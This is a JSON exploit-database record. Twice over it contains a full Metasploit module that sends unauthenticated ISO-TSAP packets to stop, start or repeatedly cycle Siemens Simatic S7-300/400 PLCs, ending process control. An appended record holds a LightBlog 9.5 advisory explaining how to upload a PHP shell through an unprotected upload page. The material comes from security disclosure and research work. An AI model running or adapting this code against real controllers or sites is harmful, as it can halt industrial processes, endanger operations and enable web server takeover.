{"hash": "c566b0fb60b1b0d39f19f6a96f0516e8ecdbee4792e40d0950aa6e1428a3f19f", "id": "1337DAY-ID-18989", "lastseen": "2018-01-05T09:10:10", "viewCount": 6, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "f907225f0567aea22bda182e0f3ad7a8", "key": "description"}, {"hash": "f3c1cf74a97f78a6e4417c3373968c0f", "key": "href"}, {"hash": "2f047dd613ce2440cb8b7a7e96329f95", "key": "modified"}, {"hash": "2f047dd613ce2440cb8b7a7e96329f95", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "ca21edede029b7f3e7d1d4ed5ab4e6db", "key": "reporter"}, {"hash": "b7bb7c0db1a30cdbce2068cbfa35c3cd", "key": "sourceData"}, {"hash": "79d73b790c2289af856b8c9f7b776f13", "key": "sourceHref"}, {"hash": "f990ff3c76bef81a4670e601fa9b86e1", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2018-01-05T09:10:10"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:18989"]}], "modified": "2018-01-05T09:10:10"}, "vulnersScore": 0.3}, "type": "zdt", "sourceHref": "https://0day.today/exploit/18989", "description": "Exploit for hardware platform in category remote exploits", "title": "Siemens Simatic S7-300/400 CPU START/STOP Module", "history": [{"bulletin": {"hash": "0fb071f36986db0374cd7ef7b5afb1e1f9251f3bf7249c774f2886b1c96c812e", "id": "1337DAY-ID-18989", "lastseen": "2016-04-20T01:30:06", "enchantments": {"score": {"value": 8.5, "modified": "2016-04-20T01:30:06"}}, "hashmap": [{"hash": "f907225f0567aea22bda182e0f3ad7a8", "key": "description"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "c94494b59125874daeb640d4f018b22a", "key": "sourceHref"}, {"hash": "f990ff3c76bef81a4670e601fa9b86e1", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "2f047dd613ce2440cb8b7a7e96329f95", "key": "modified"}, {"hash": "e009ae992c1321e1e1fc17f8b6d1e9be", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "2f047dd613ce2440cb8b7a7e96329f95", "key": "published"}, {"hash": "d3d589959b43cf4502d9563444e0e806", "key": "sourceData"}, {"hash": "ca21edede029b7f3e7d1d4ed5ab4e6db", "key": "reporter"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/18989", "description": "Exploit for hardware platform in category remote exploits", "viewCount": 2, "title": "Siemens Simatic S7-300/400 CPU START/STOP Module", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "# Exploit Title: Siemens Simatic S7 300/400 CPU command module\r\n# Date: 7-13-2012\r\n# Exploit Author: Dillon Beresford\r\n# Vendor Homepage: http://www.siemens.com/\r\n# Tested on: Siemens Simatic S7-300 PLC\r\n# CVE : None\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Auxiliary\r\n \r\n include Msf::Exploit::Remote::Tcp\r\n include Rex::Socket::Tcp\r\n include Msf::Auxiliary::Scanner\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name'=> 'Siemens Simatic S7-300/400 CPU START/STOP Module',\r\n 'Description' => %q{\r\n The Siemens Simatic S7-300/400 S7 CPU start and stop functions over ISO-TSAP\r\n this modules allows an attacker to perform administrative commands without authentication.\r\n This module allows a remote user to change the state of the PLC between\r\n STOP and START, allowing an attacker to end process control by the PLC.\r\n },\r\n 'Author' => 'Dillon Beresford',\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-186-01.pdf' ],\r\n [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-161-01.pdf' ],\r\n ],\r\n 'Version' => '$Revision$',\r\n 'DisclosureDate' => 'May 09 2011'\r\n ))\r\n \r\n register_options(\r\n [\r\n Opt::RPORT(102),\r\n OptInt.new('MODE', [false, 'Set true to put the CPU back into RUN mode.',false]),\r\n OptInt.new('CYCLES',[true,\"Set the amount of CPU STOP/RUN cycles.\",10])\r\n ], self.class)\r\n end\r\n \r\n def run_host(ip)\r\n begin\r\n \r\n cpu = datastore['MODE'] || ''\r\n cycles = datastore['CYCLES'] || ''\r\n \r\n stop_cpu_pkt =\r\n [\r\n \"\\x03\\x00\\x00\\x16\\x11\\xe0\\x00\\x00\"+\r\n \"\\x00\\x01\\x00\\xc1\\x02\\x01\\x00\\xc2\"+\r\n \"\\x02\\x01\\x02\\xc0\\x01\\x09\",\r\n \r\n \"\\x03\\x00\\x00\\x19\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\xff\\xff\\x00\\x08\\x00\"+\r\n \"\\x00\\xf0\\x00\\x00\\x01\\x00\\x01\\x03\"+\r\n \"\\xc0\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x00\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x40\\x00\\x01\\x84\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x21\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x02\\x00\\x10\\x00\"+\r\n \"\\x00\\x29\\x00\\x00\\x00\\x00\\x00\\x09\"+\r\n \"\\x50\\x5f\\x50\\x52\\x4f\\x47\\x52\\x41\"+\r\n \"\\x4d\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\"\r\n ]\r\n \r\n start_cpu_pkt =\r\n [\r\n \"\\x03\\x00\\x00\\x16\\x11\\xe0\\x00\\x00\"+\r\n \"\\x00\\x01\\x00\\xc1\\x02\\x01\\x00\\xc2\"+\r\n \"\\x02\\x01\\x02\\xc0\\x01\\x09\",\r\n \r\n \"\\x03\\x00\\x00\\x19\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\xff\\xff\\x00\\x08\\x00\"+\r\n \"\\x00\\xf0\\x00\\x00\\x01\\x00\\x01\\x03\"+\r\n \"\\xc0\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x00\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x40\\x00\\x01\\x84\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \r\n \"\\x03\\x00\\x00\\x25\\x02\\xf0\\x80\\x32\"+ \r\n \"\\x01\\x00\\x00\\x00\\x02\\x00\\x14\\x00\"+\r\n \"\\x00\\x28\\x00\\x00\\x00\\x00\\x00\\x00\"+\r\n \"\\xfd\\x00\\x00\\x09\\x50\\x5f\\x50\\x52\"+\r\n \"\\x4f\\x47\\x52\\x41\\x4d\"\r\n \r\n ]\r\n # CPU STOP \r\n if(cpu == 1)\r\n connect()\r\n stop_cpu_pkt.each do |i|\r\n sock.put(\"#{i}\")\r\n sleep(0.005)\r\n end\r\n end\r\n # CPU START\r\n if(cpu == 2)\r\n connect()\r\n start_cpu_pkt.each do |i|\r\n sock.put(\"#{i}\")\r\n sleep(0.005)\r\n end\r\n end\r\n # STOP / START CPU\r\n for n in 0..cycles\r\n if(cpu == 3)\r\n connect()\r\n # We assume PLC is up and running (issue a stop command)\r\n stop_cpu_pkt.each do |i| \r\n sock.put(\"#{i}\")\r\n sleep(0.005)\r\n end\r\n \r\n connect()\r\n # We assume PLC is has been stopped (issue a start command)\r\n start_cpu_pkt.each do |i|\r\n sock.put(\"#{i}\")\r\n sleep(0.005)\r\n end\r\n end\r\n end\r\n \r\n data = sock.get_once() \r\n print_good(\"#{ip} PLC is running, iso-tsap port is open.\")\r\n if(cpu == 'true')\r\n print_status(\"Putting the PLC into START mode.\")\r\n elsif(cpu == 'false')\r\n print_status(\"Putting the PLC into STOP mode.\")\r\n end\r\n disconnect()\r\n rescue ::EOFError\r\n end\r\n end\r\nend\r\n\r\n\n\n# 0day.today [2016-04-20] #", "published": "2012-07-13T00:00:00", "references": [], "reporter": "Dillon Beresford", "modified": "2012-07-13T00:00:00", "href": "http://0day.today/exploit/description/18989"}, "lastseen": "2016-04-20T01:30:06", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "# Exploit Title: Siemens Simatic S7 300/400 CPU command module\r\n# Date: 7-13-2012\r\n# Exploit Author: Dillon Beresford\r\n# Vendor Homepage: http://www.siemens.com/\r\n# Tested on: Siemens Simatic S7-300 PLC\r\n# CVE : None\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Auxiliary\r\n \r\n include Msf::Exploit::Remote::Tcp\r\n include Rex::Socket::Tcp\r\n include Msf::Auxiliary::Scanner\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name'=> 'Siemens Simatic S7-300/400 CPU START/STOP Module',\r\n 'Description' => %q{\r\n The Siemens Simatic S7-300/400 S7 CPU start and stop functions over ISO-TSAP\r\n this modules allows an attacker to perform administrative commands without authentication.\r\n This module allows a remote user to change the state of the PLC between\r\n STOP and START, allowing an attacker to end process control by the PLC.\r\n },\r\n 'Author' => 'Dillon Beresford',\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-186-01.pdf' ],\r\n [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-161-01.pdf' ],\r\n ],\r\n 'Version' => '$Revision$',\r\n 'DisclosureDate' => 'May 09 2011'\r\n ))\r\n \r\n register_options(\r\n [\r\n Opt::RPORT(102),\r\n OptInt.new('MODE', [false, 'Set true to put the CPU back into RUN mode.',false]),\r\n OptInt.new('CYCLES',[true,\"Set the amount of CPU STOP/RUN cycles.\",10])\r\n ], self.class)\r\n end\r\n \r\n def run_host(ip)\r\n begin\r\n \r\n cpu = datastore['MODE'] || ''\r\n cycles = datastore['CYCLES'] || ''\r\n \r\n stop_cpu_pkt =\r\n [\r\n \"\\x03\\x00\\x00\\x16\\x11\\xe0\\x00\\x00\"+\r\n \"\\x00\\x01\\x00\\xc1\\x02\\x01\\x00\\xc2\"+\r\n \"\\x02\\x01\\x02\\xc0\\x01\\x09\",\r\n \r\n \"\\x03\\x00\\x00\\x19\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\xff\\xff\\x00\\x08\\x00\"+\r\n \"\\x00\\xf0\\x00\\x00\\x01\\x00\\x01\\x03\"+\r\n \"\\xc0\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x00\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x40\\x00\\x01\\x84\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x21\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x02\\x00\\x10\\x00\"+\r\n \"\\x00\\x29\\x00\\x00\\x00\\x00\\x00\\x09\"+\r\n \"\\x50\\x5f\\x50\\x52\\x4f\\x47\\x52\\x41\"+\r\n \"\\x4d\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\"\r\n ]\r\n \r\n start_cpu_pkt =\r\n [\r\n \"\\x03\\x00\\x00\\x16\\x11\\xe0\\x00\\x00\"+\r\n \"\\x00\\x01\\x00\\xc1\\x02\\x01\\x00\\xc2\"+\r\n \"\\x02\\x01\\x02\\xc0\\x01\\x09\",\r\n \r\n \"\\x03\\x00\\x00\\x19\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\xff\\xff\\x00\\x08\\x00\"+\r\n \"\\x00\\xf0\\x00\\x00\\x01\\x00\\x01\\x03\"+\r\n \"\\xc0\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x00\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x40\\x00\\x01\\x84\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \r\n \"\\x03\\x00\\x00\\x25\\x02\\xf0\\x80\\x32\"+ \r\n \"\\x01\\x00\\x00\\x00\\x02\\x00\\x14\\x00\"+\r\n \"\\x00\\x28\\x00\\x00\\x00\\x00\\x00\\x00\"+\r\n \"\\xfd\\x00\\x00\\x09\\x50\\x5f\\x50\\x52\"+\r\n \"\\x4f\\x47\\x52\\x41\\x4d\"\r\n \r\n ]\r\n # CPU STOP \r\n if(cpu == 1)\r\n connect()\r\n stop_cpu_pkt.each do |i|\r\n sock.put(\"#{i}\")\r\n sleep(0.005)\r\n end\r\n end\r\n # CPU START\r\n if(cpu == 2)\r\n connect()\r\n start_cpu_pkt.each do |i|\r\n sock.put(\"#{i}\")\r\n sleep(0.005)\r\n end\r\n end\r\n # STOP / START CPU\r\n for n in 0..cycles\r\n if(cpu == 3)\r\n connect()\r\n # We assume PLC is up and running (issue a stop command)\r\n stop_cpu_pkt.each do |i| \r\n sock.put(\"#{i}\")\r\n sleep(0.005)\r\n end\r\n \r\n connect()\r\n # We assume PLC is has been stopped (issue a start command)\r\n start_cpu_pkt.each do |i|\r\n sock.put(\"#{i}\")\r\n sleep(0.005)\r\n end\r\n end\r\n end\r\n \r\n data = sock.get_once() \r\n print_good(\"#{ip} PLC is running, iso-tsap port is open.\")\r\n if(cpu == 'true')\r\n print_status(\"Putting the PLC into START mode.\")\r\n elsif(cpu == 'false')\r\n print_status(\"Putting the PLC into STOP mode.\")\r\n end\r\n disconnect()\r\n rescue ::EOFError\r\n end\r\n end\r\nend\r\n\r\n\n\n# 0day.today [2018-01-05] #", "published": "2012-07-13T00:00:00", "references": [], "reporter": "Dillon Beresford", "modified": "2012-07-13T00:00:00", "href": "https://0day.today/exploit/description/18989"}

{"securityvulns": [{"lastseen": "2018-08-31T11:10:24", "bulletinFamily": "software", "description": " LightBlog 9.5 - REMOTE FILE UPLOAD VULNERABILITY\r\nby Omni\r\n1&#41; Infos\r\n---------\r\nDate : 2008-01-30\r\nProduct : LightBlog\r\nVersion : v 9.5\r\nVendor : http://www.publicwarehouse.co.uk/\r\nVendor Status :\r\n2008-01-31 Informed!\r\n2008-01-31 Patch received from vendor!\r\n2008-02-01 Published!\r\n\r\n\r\nDescription : Lightblog provides webmasters who don&#39;t have SQL databases with a fully featured blogging system. Using\r\ntext files to store data, there&#39;s no need for complicated installation procedures or a potentially pricey\r\nhosting bill.\r\nDork : &quot;Powered by LightBlog&quot; - Powered by LightBlog\r\nSource : omnipresent - omni - http://omni.netsons.org\r\n\r\nE-mail : omnipresent[at]NOSPAMemail[dot]it - omni[at]NOSPAMplayhack[dot]\r\nTeam : Playhack.net Security\r\n\r\n\r\n2&#41; Security Issues\r\n-------------------\r\n\r\n\r\n--- [ Remote File Upload Vulnerability ] ---\r\n===============================================\r\nA remote file upload vulnerability is present in LightBlog version 9.5.\r\nUsers without permissions are able to upload any kind of files, also .php; so the attacker can upload their own remote PHP\r\nshell.\r\nThe file vulnerable is: cp_upload_image.php, and you can find it under the root directory of the blog uploaded. &#40;shown\r\nin the section PoC&#41;.\r\n\r\n\r\n--- [ PoC ] ---\r\n===============\r\nhttp://localhost/light/cp_upload_image.php\r\nJust look for your PHP shell, upload it &#40;shell.php&#41; and then use it:\r\nhttp://localhost/light/images/shell.php\r\n\r\n\r\n--- [ Patch ] ---\r\n===============\r\n- Edit the source code.\r\n- use CHMOD\r\n- Delete cp_upload_image.php\r\n- Use the vendor patch.", "modified": "2008-02-01T00:00:00", "published": "2008-02-01T00:00:00", "id": "SECURITYVULNS:DOC:18989", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:18989", "title": "LightBlog Remote File Upload Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:28", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2008-02-01T00:00:00", "published": "2008-02-01T00:00:00", "id": "SECURITYVULNS:VULN:8626", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8626", "title": "Daily web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}